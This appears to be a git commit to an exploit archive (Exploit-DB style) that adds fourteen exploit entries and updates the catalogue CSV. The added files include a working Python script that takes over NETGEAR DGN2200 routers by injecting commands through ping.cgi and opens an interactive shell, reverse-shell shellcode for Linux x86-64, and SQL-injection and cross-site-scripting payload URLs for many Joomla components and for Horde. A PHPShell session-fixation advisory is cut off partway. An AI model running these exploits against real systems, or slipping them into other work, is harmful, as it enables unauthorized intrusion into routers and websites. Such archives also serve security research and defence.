DB: 2017-02-20
14 new exploits Linux - Reverse Shell Shellcode (66 bytes) Joomla! Component com_Joomlaoc - 'id' SQL Injection Joomla! Component Joomloc 1.0 - 'id' Parameter SQL Injection Joomla! Component com_awdwall 1.5.4 - Local File Inclusion / SQL Injection Joomla! Component AWDwall 1.5.4 - Local File Inclusion / SQL Injection Joomla! Component 'com_osproperty' 2.0.2 - Unrestricted Arbitrary File Upload Joomla! Component com_osproperty 2.0.2 - Unrestricted Arbitrary File Upload Horde 3.3.5 - Administration Interface admin/PHPshell.php PATH_INFO Parameter Cross-Site Scripting Horde 3.3.5 - Cross-Site Scripting Joomla! Component Joomloc-CAT 4.1.3 - 'ville' Parameter SQL Injection Joomla! Component Joomloc-Lite 1.3.2 - 'site_id' Parameter SQL Injection Joomla! Component JomWALL 4.0 - 'wuid' Parameter SQL Injection Joomla! Component OS Property 3.0.8 - SQL Injection Joomla! Component EShop 2.5.1 - 'id' Parameter SQL Injection Joomla! Component OS Services Booking 2.5.1 - SQL Injection Joomla! Component Room Management 1.0 - SQL Injection Joomla! Component Bazaar Platform 3.0 - SQL Injection Joomla! Component Google Map Store Locator 4.4 - SQL Injection Joomla! Component Most Wanted Real Estate 1.1.0 - SQL Injection NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution Sawmill Enterprise 8.7.9 - Authentication Bypass PHPShell 2.4 - Session Fixation
This commit is contained in:
parent
2d72a9c8b9
commit
ae0dd9fa7c
16 changed files with 614 additions and 5 deletions
22
files.csv
22
files.csv
|
@ -15898,6 +15898,7 @@ id,file,description,date,author,platform,type,port
|
|||
41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0
|
||||
41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0
|
||||
41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0
|
||||
41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (66 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0
|
||||
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
||||
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
||||
|
@ -21643,7 +21644,7 @@ id,file,description,date,author,platform,type,port
|
|||
9601,platforms/php/webapps/9601.php,"Joomla! Component BF Survey Pro Free - SQL Injection",2009-09-09,jdc,php,webapps,0
|
||||
9602,platforms/php/webapps/9602.pl,"Joomla! Component TPDugg 1.1 - Blind SQL Injection",2009-09-09,NoGe,php,webapps,0
|
||||
9603,platforms/php/webapps/9603.txt,"Model Agency Manager Pro - (user_id) SQL Injection",2009-09-09,R3d-D3V!L,php,webapps,0
|
||||
9604,platforms/php/webapps/9604.txt,"Joomla! Component com_Joomlaoc - 'id' SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0
|
||||
9604,platforms/php/webapps/9604.txt,"Joomla! Component Joomloc 1.0 - 'id' Parameter SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0
|
||||
9605,platforms/php/webapps/9605.pl,"Agoko CMS 0.4 - Remote Command Execution",2009-09-09,StAkeR,php,webapps,0
|
||||
9609,platforms/php/webapps/9609.txt,"Mambo Component Hestar - SQL Injection",2009-09-09,M3NW5,php,webapps,0
|
||||
9611,platforms/php/webapps/9611.txt,"PHPNagios 1.2.0 - 'menu.php' Local File Inclusion",2009-09-09,CoBRa_21,php,webapps,0
|
||||
|
@ -22939,7 +22940,7 @@ id,file,description,date,author,platform,type,port
|
|||
12108,platforms/php/webapps/12108.txt,"Joomla! Component com_articles - SQL Injection",2010-04-08,"pratul agrawal",php,webapps,0
|
||||
12111,platforms/php/webapps/12111.txt,"Joomla! Component 'com_webeecomment' 2.0 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0
|
||||
12112,platforms/php/webapps/12112.txt,"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0
|
||||
12113,platforms/php/webapps/12113.txt,"Joomla! Component com_awdwall 1.5.4 - Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0
|
||||
12113,platforms/php/webapps/12113.txt,"Joomla! Component AWDwall 1.5.4 - Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0
|
||||
12115,platforms/php/webapps/12115.txt,"Kubeit CMS - SQL Injection",2010-04-08,Phenom,php,webapps,0
|
||||
12118,platforms/php/webapps/12118.txt,"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion",2010-04-09,AntiSecurity,php,webapps,0
|
||||
12120,platforms/php/webapps/12120.txt,"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0
|
||||
|
@ -25626,7 +25627,7 @@ id,file,description,date,author,platform,type,port
|
|||
19792,platforms/php/webapps/19792.txt,"Joomla! Component 'com_ksadvertiser' - Remote File / Bypass Upload",2012-07-13,D4NB4R,php,webapps,0
|
||||
19825,platforms/php/webapps/19825.php,"Shopware 3.5 - SQL Injection",2012-07-14,Kataklysmos,php,webapps,0
|
||||
19964,platforms/php/webapps/19964.txt,"PHP-Nuke module (SPChat) - SQL Injection",2012-07-20,"Yakir Wizman",php,webapps,0
|
||||
19829,platforms/php/webapps/19829.txt,"Joomla! Component 'com_osproperty' 2.0.2 - Unrestricted Arbitrary File Upload",2012-07-14,D4NB4R,php,webapps,0
|
||||
19829,platforms/php/webapps/19829.txt,"Joomla! Component com_osproperty 2.0.2 - Unrestricted Arbitrary File Upload",2012-07-14,D4NB4R,php,webapps,0
|
||||
19859,platforms/hardware/webapps/19859.txt,"Vivotek Cameras - Sensitive Information Disclosure",2012-07-16,GothicX,hardware,webapps,0
|
||||
19862,platforms/php/webapps/19862.pl,"WordPress Theme Diary/Notebook Site5 - Email Spoofing",2012-07-16,bwall,php,webapps,0
|
||||
19863,platforms/php/webapps/19863.txt,"CakePHP 2.x < 2.2.0-RC2 - XXE Injection",2012-07-16,"Pawel Wylecial",php,webapps,0
|
||||
|
@ -27494,7 +27495,7 @@ id,file,description,date,author,platform,type,port
|
|||
25302,platforms/php/webapps/25302.txt,"PHPCOIN 1.2 - auxpage.php page Parameter Traversal Arbitrary File Access",2005-03-29,"James Bercegay",php,webapps,0
|
||||
25304,platforms/php/webapps/25304.py,"MoinMoin - Arbitrary Command Execution",2013-05-08,HTP,php,webapps,0
|
||||
25305,platforms/multiple/webapps/25305.py,"ColdFusion 9-10 - Credential Disclosure",2013-05-08,HTP,multiple,webapps,0
|
||||
33406,platforms/php/webapps/33406.txt,"Horde 3.3.5 - Administration Interface admin/PHPshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0
|
||||
33406,platforms/php/webapps/33406.txt,"Horde 3.3.5 - Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0
|
||||
33407,platforms/php/webapps/33407.txt,"Horde 3.3.5 - Administration Interface admin/cmdshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0
|
||||
33408,platforms/php/webapps/33408.txt,"Horde 3.3.5 - Administration Interface admin/sqlshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0
|
||||
25308,platforms/php/webapps/25308.txt,"PhotoPost Pro 5.1 - showgallery.php Multiple Parameter Cross-Site Scripting",2005-03-28,"Diabolic Crab",php,webapps,0
|
||||
|
@ -37300,3 +37301,16 @@ id,file,description,date,author,platform,type,port
|
|||
41379,platforms/php/webapps/41379.txt,"Joomla! Component Team Display 1.2.1 - 'filter_category' Parameter SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0
|
||||
41380,platforms/php/webapps/41380.txt,"Joomla! Component Groovy Gallery 1.0.0 - SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0
|
||||
41382,platforms/php/webapps/41382.txt,"Joomla! Component WMT Content Timeline 1.0 - 'id' Parameter SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0
|
||||
41383,platforms/php/webapps/41383.txt,"Joomla! Component Joomloc-CAT 4.1.3 - 'ville' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41384,platforms/php/webapps/41384.txt,"Joomla! Component Joomloc-Lite 1.3.2 - 'site_id' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41385,platforms/php/webapps/41385.txt,"Joomla! Component JomWALL 4.0 - 'wuid' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41386,platforms/php/webapps/41386.txt,"Joomla! Component OS Property 3.0.8 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41387,platforms/php/webapps/41387.txt,"Joomla! Component EShop 2.5.1 - 'id' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41388,platforms/php/webapps/41388.txt,"Joomla! Component OS Services Booking 2.5.1 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41389,platforms/php/webapps/41389.txt,"Joomla! Component Room Management 1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41390,platforms/php/webapps/41390.txt,"Joomla! Component Bazaar Platform 3.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41391,platforms/php/webapps/41391.txt,"Joomla! Component Google Map Store Locator 4.4 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41393,platforms/php/webapps/41393.txt,"Joomla! Component Most Wanted Real Estate 1.1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
|
||||
41394,platforms/hardware/webapps/41394.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution",2017-02-18,SivertPL,hardware,webapps,0
|
||||
41395,platforms/windows/webapps/41395.txt,"Sawmill Enterprise 8.7.9 - Authentication Bypass",2017-02-18,hyp3rlinx,windows,webapps,0
|
||||
41396,platforms/php/webapps/41396.txt,"PHPShell 2.4 - Session Fixation",2017-02-19,hyp3rlinx,php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
58
platforms/hardware/webapps/41394.py
Executable file
58
platforms/hardware/webapps/41394.py
Executable file
|
@ -0,0 +1,58 @@
|
|||
#!/usr/bin/python
|
||||
#Provides access to default user account, privileges can be easily elevated by using either:
|
||||
# - a kernel exploit (ex. memodipper was tested and it worked)
|
||||
# - by executing /bin/bd (suid backdoor present on SOME but not all versions)
|
||||
# - by manipulating the httpd config files to trick the root user into executing your code (separate advisory will be released soon along with the 2nd vuln)
|
||||
|
||||
#Pozdrawiam: Kornela, Komara i Sknerusa
|
||||
|
||||
import sys
|
||||
import requests
|
||||
|
||||
#You can change these credentials to ex. Gearguy/Geardog or Guest/Guest which are hardcoded on SOME firmware versions
|
||||
#These routers DO NOT support telnet/ssh access so you can use this exploit to access the shell if you want to
|
||||
|
||||
login = 'admin'
|
||||
password = 'password'
|
||||
|
||||
|
||||
def main():
|
||||
if len(sys.argv) < 2 or len(sys.argv) == 3:
|
||||
print "./netgearpwn.py <router ip>"
|
||||
return
|
||||
spawnShell()
|
||||
|
||||
def execute(cmd):
|
||||
r = requests.post("http://" + sys.argv[1] + "/ping.cgi", data={'IPAddr1': 12, 'IPAddr2': 12, 'IPAddr3': 12, 'IPAddr4': 12, 'ping':"Ping", 'ping_IPAddr':"12.12.12.12; " + cmd}, auth=(login, password), headers={'referer': "http://192.168.0.1/DIAG_diag.htm"})
|
||||
result = parseOutput(r.text)
|
||||
return result
|
||||
|
||||
def spawnShell():
|
||||
r = execute("echo pwn3d")
|
||||
|
||||
if any("pwn3d" in s for s in r) == False:
|
||||
print "Something went wrong, is the system vulnerable? Are the credentials correct?"
|
||||
return
|
||||
|
||||
while True:
|
||||
cmd = raw_input("$ ")
|
||||
r = execute(cmd)
|
||||
for l in r:
|
||||
print l.encode("utf-8")
|
||||
|
||||
def parseOutput(output):
|
||||
yet = False
|
||||
a = False
|
||||
result = []
|
||||
for line in output.splitlines():
|
||||
if line.startswith("<textarea"):
|
||||
yet = True
|
||||
continue
|
||||
if yet == True:
|
||||
if line.startswith("</textarea>"):
|
||||
break
|
||||
result.append(line)
|
||||
return result
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
71
platforms/linux/shellcode/41398.nasm
Executable file
71
platforms/linux/shellcode/41398.nasm
Executable file
|
@ -0,0 +1,71 @@
|
|||
;The MIT License (MIT)
|
||||
|
||||
;Copyright (c) 2017 Robert L. Taylor
|
||||
|
||||
;Permission is hereby granted, free of charge, to any person obtaining a
|
||||
;copy of this software and associated documentation files (the “Software”),
|
||||
;to deal in the Software without restriction, including without limitation
|
||||
;the rights to use, copy, modify, merge, publish, distribute, sublicense,
|
||||
;and/or sell copies of the Software, and to permit persons to whom the
|
||||
;Software is furnished to do so, subject to the following conditions:
|
||||
|
||||
;The above copyright notice and this permission notice shall be included
|
||||
;in all copies or substantial portions of the Software.
|
||||
|
||||
;The Software is provided “as is”, without warranty of any kind, express or
|
||||
;implied, including but not limited to the warranties of merchantability,
|
||||
;fitness for a particular purpose and noninfringement. In no event shall the
|
||||
;authors or copyright holders be liable for any claim, damages or other
|
||||
;liability, whether in an action of contract, tort or otherwise, arising
|
||||
;from, out of or in connection with the software or the use or other
|
||||
;dealings in the Software.
|
||||
;
|
||||
; For a detailed explanation of this shellcode see my blog post:
|
||||
; http://a41l4.blogspot.ca/2017/02/assignment-2b.html
|
||||
|
||||
global _start
|
||||
section .text
|
||||
_start:
|
||||
; Socket
|
||||
push 41
|
||||
pop rax
|
||||
push 2
|
||||
pop rdi
|
||||
push 1
|
||||
pop rsi
|
||||
cdq
|
||||
syscall
|
||||
; Connect
|
||||
xchg edi, eax
|
||||
push rdx
|
||||
mov rbx, 0xfeffff80a3eefffd ; not encoded 0x0100007f5c110002
|
||||
not rbx
|
||||
push rbx
|
||||
mov al, 42
|
||||
push rsp
|
||||
pop rsi
|
||||
mov dl, 16
|
||||
syscall
|
||||
; Dup 2
|
||||
push 3
|
||||
pop rsi
|
||||
dup2loop:
|
||||
mov al, 33
|
||||
dec esi
|
||||
syscall
|
||||
loopnz dup2loop
|
||||
; Execve
|
||||
; rax and rsi are zero from the result of the last dup2 syscall and loop
|
||||
push rax ; zero terminator for the following string that we are pushing
|
||||
|
||||
mov rbx, '/bin//sh'
|
||||
push rbx
|
||||
|
||||
; store /bin//sh address in RDI
|
||||
push rsp
|
||||
pop rdi
|
||||
|
||||
cdq ; zero rdx
|
||||
|
||||
mov al, 59
|
||||
syscall
|
|
@ -8,4 +8,4 @@ This issue affects versions prior to Horde 3.3.6.
|
|||
|
||||
Note that additional products that use the Horde framework may also be vulnerable.
|
||||
|
||||
http://www.example.com/horde-3.3.5/admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid>
|
||||
http://www.example.com/horde-3.3.5/admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid>
|
17
platforms/php/webapps/41383.txt
Executable file
17
platforms/php/webapps/41383.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Joomloc-CAT v4.1.3 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_joomloc
|
||||
# Date: 18.02.2017
|
||||
# Vendor Homepage: http://www.joomloc.fr.nf/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/joomloc-cat/
|
||||
# Demo: http://www.joomloc.fr.nf/joomlocprocmpms/
|
||||
# Version: 4.1.3
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_joomloc&view=engine&layout=geo&liste=65&place=dep&ville=[SQL]
|
||||
# # # # #
|
18
platforms/php/webapps/41384.txt
Executable file
18
platforms/php/webapps/41384.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Joomloc-Lite v1.3.2 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_joomloc
|
||||
# Date: 18.02.2017
|
||||
# Vendor Homepage: http://www.joomloc.fr.nf/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/joomloc-lite/
|
||||
# Demo: http://www.joomloc.fr.nf/joomloclite/
|
||||
# Version: 1.3.2
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_joomloc&view=loc&layout=singleloc&site_id=[SQL]
|
||||
# # # # #
|
||||
|
17
platforms/php/webapps/41385.txt
Executable file
17
platforms/php/webapps/41385.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JomWALL v4.0 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_awdwall
|
||||
# Date: 18.02.2017
|
||||
# Vendor Homepage: http://dashbite.com/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/clients-a-communities/communities/jomwall/
|
||||
# Demo: http://demo-dashbite.com/
|
||||
# Version: 4.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_awdwall&task=gethovercard&wuid=[SQL]
|
||||
# # # # #
|
17
platforms/php/webapps/41386.txt
Executable file
17
platforms/php/webapps/41386.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component OS Property v3.0.8 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_osproperty
|
||||
# Date: 18.02.2017
|
||||
# Vendor Homepage: https://www.joomdonation.com/
|
||||
# Software Buy: https://www.joomdonation.com/joomla-extensions/os-property-joomla-real-estate.html
|
||||
# Demo: http://osproperty.ext4joomla.com/
|
||||
# Version: 3.0.8
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_osproperty&view=ltype&catIds[0]=[SQL]
|
||||
# # # # #
|
17
platforms/php/webapps/41387.txt
Executable file
17
platforms/php/webapps/41387.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component EShop v2.5.1 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_eshop
|
||||
# Date: 18.02.2017
|
||||
# Vendor Homepage: https://www.joomdonation.com/
|
||||
# Software Buy: https://www.joomdonation.com/joomla-extensions/eshop-joomla-shopping-cart.html
|
||||
# Demo: http://joomdonationdemo.com/eshop
|
||||
# Version: 2.5.1
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_eshop&view=category&id=[SQL]
|
||||
# # # # #
|
21
platforms/php/webapps/41388.txt
Executable file
21
platforms/php/webapps/41388.txt
Executable file
|
@ -0,0 +1,21 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component OS Services Booking v2.5.1 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_osservicesbooking
|
||||
# Date: 18.02.2017
|
||||
# Vendor Homepage: https://www.joomdonation.com/
|
||||
# Software Buy: https://www.joomdonation.com/joomla-extensions/joomla-services-appointment-booking.html
|
||||
# Demo: http://osb.ext4joomla.com/
|
||||
# Version: 2.5.1
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&task=default_showmap&vid=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=15&employee_id=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=15&employee_id=&vid=[SQL]
|
||||
# Etc..
|
||||
# # # # #
|
23
platforms/php/webapps/41389.txt
Executable file
23
platforms/php/webapps/41389.txt
Executable file
|
@ -0,0 +1,23 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Room Management v1.0 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_roommgmt
|
||||
# Date: 18.02.2017
|
||||
# Vendor Homepage: http://matamko.com/
|
||||
# Software Buy: http://matamko.com/products/room-management/live-demo
|
||||
# Demo: http://matamko.com/products/room-management/live-demo
|
||||
# Version: 1.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/room/book?tmpl=component&id=5&date=[SQL]
|
||||
# '+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
|
||||
# http://localhost/[PATH]/my-bookings?task=booking.cancelBooking&status=[SQL]
|
||||
# '+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
|
||||
# http://localhost/[PATH]/my-bookings?task=booking.cancelBooking&status=0&id=[SQL]
|
||||
# +/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
|
||||
# Etc...
|
||||
# # # # #
|
23
platforms/php/webapps/41390.txt
Executable file
23
platforms/php/webapps/41390.txt
Executable file
|
@ -0,0 +1,23 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Bazaar Platform v3.0 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_bazaar
|
||||
# Date: 18.02.2017
|
||||
# Vendor Homepage: http://matamko.com/
|
||||
# Software Buy: http://matamko.com/products/bazaar/live-demo
|
||||
# Demo: http://matamko.com/products/bazaar/live-demo
|
||||
# Version: 3.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_bazaar&view=productsearch&searchproduct=a&category=[SQL]
|
||||
# 1+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
|
||||
# http://localhost/[PATH]/index.php?option=com_bazaar&view=productsearch&searchproduct=[SQL]
|
||||
# 1'+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
|
||||
# http://localhost/[PATH]/index.php?option=com_bazaar&view=product&productid=[SQL]
|
||||
# 1+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
|
||||
# Etc...
|
||||
# # # # #
|
19
platforms/php/webapps/41391.txt
Executable file
19
platforms/php/webapps/41391.txt
Executable file
|
@ -0,0 +1,19 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Google Map Store Locator v4.4 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_googlemaplocator
|
||||
# Date: 18.02.2017
|
||||
# Vendor Homepage: http://matamko.com/
|
||||
# Software Buy: http://matamko.com/products/google-map-store-locator/live-demo
|
||||
# Demo: http://gtlocator4.demo.matamko.com/
|
||||
# Version: 4.4
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/?filter_to=a&filter_day=21-02-2017&filter_time=[SQL]
|
||||
# +/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
|
||||
# Etc...
|
||||
# # # # #
|
20
platforms/php/webapps/41393.txt
Executable file
20
platforms/php/webapps/41393.txt
Executable file
|
@ -0,0 +1,20 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Most Wanted Real Estate v1.1.0 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_mostwantedrealestate
|
||||
# Date: 18.02.2017
|
||||
# Vendor Homepage: http://mostwantedrealestatesites.com/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/most-wanted-real-estate/
|
||||
# Demo: http://demo.mostwantedrealestatesites.com/
|
||||
# Version: 1.1.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1minprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1minbed=0&filter_a1minbaths=&filter_a1minarea=&filter_a1maxarea=&filter_a1minland=&filter_a1maxland=&filter_a1landtype=0&which_order=[SQL]
|
||||
# http://localhost/[PATH]/?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1minprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1minbed=0&filter_a1minbaths=&filter_a1minarea=&filter_a1maxarea=[SQL]
|
||||
# http://localhost/[PATH]/?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1minprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1minbed=0&filter_a1minbaths=&filter_a1minarea=[SQL]
|
||||
# Etc...
|
||||
# # # # #
|
136
platforms/php/webapps/41396.txt
Executable file
136
platforms/php/webapps/41396.txt
Executable file
|
@ -0,0 +1,136 @@
|
|||
[+] Credits: John Page AKA hyp3rlinx
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-SESSION-FIXATION.txt
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
|
||||
Vendor:
|
||||
==================================
|
||||
sourceforge.net/projects/phpshell/
|
||||
phpshell.sourceforge.net/
|
||||
|
||||
|
||||
|
||||
Product:
|
||||
==============
|
||||
PHPShell v2.4
|
||||
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
===================
|
||||
Session Fixation
|
||||
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
N/A
|
||||
|
||||
|
||||
|
||||
Security Issue:
|
||||
================
|
||||
PHPShell does not regenerate the Session ID upon authentication, this can
|
||||
potentially allow remote attackers to access parts of the application
|
||||
using only a valid PHPSESSID if PHP.INI setting for
|
||||
session.use_only_cookies=0.
|
||||
|
||||
Since an existing XSS vulnerability exists in PHPShell "
|
||||
http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-CROSS-SITE-SCRIPTING.txt"
|
||||
the risk is
|
||||
increased if an authenticated user clicks an attacker supplied link and the
|
||||
attacker finds way to access or set the victims Cookie.
|
||||
|
||||
In 'phpshell.php' line 153 we see call to PHP function session_start();
|
||||
|
||||
After user authentication no call to "session_regenerate_id()" is made
|
||||
leaving the authenticated session id same as pre-auth session id.
|
||||
However, "session.use_only_cookies=1" is default since PHP 4.3.0, so to
|
||||
exploit it would require that PHP.INI is set to session.use_only_cookies=0
|
||||
on the victims system.
|
||||
|
||||
When accessing the application using the session fixation flaw and
|
||||
